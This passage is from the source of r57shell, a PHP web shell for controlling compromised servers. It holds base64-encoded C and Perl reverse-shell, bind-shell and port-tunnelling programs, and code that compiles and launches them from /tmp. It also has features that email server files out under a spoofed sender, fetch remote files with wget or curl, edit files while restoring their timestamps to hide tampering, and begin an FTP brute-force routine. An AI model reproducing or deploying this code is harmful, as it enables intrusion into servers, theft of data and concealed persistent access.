+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA 
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC 
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); 
+$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." 
<a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; 
+echo "<font face=Verdana size=2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +$f = '<br>'; +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + 
"type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana 
size=2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+ }
+ else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+ }
+ else if($_POST['action'] == "delete"){
+ if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+ $_POST['cmd']="";
+ }
+ break;
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." 
\">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." 
...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+ $_POST['dir']."/".$nfn)
+ or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." 
> ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { fe($language,0); }
+ else
+ {
+ if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
+ else
+ {
+ if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
+ if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
+ }
+ }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
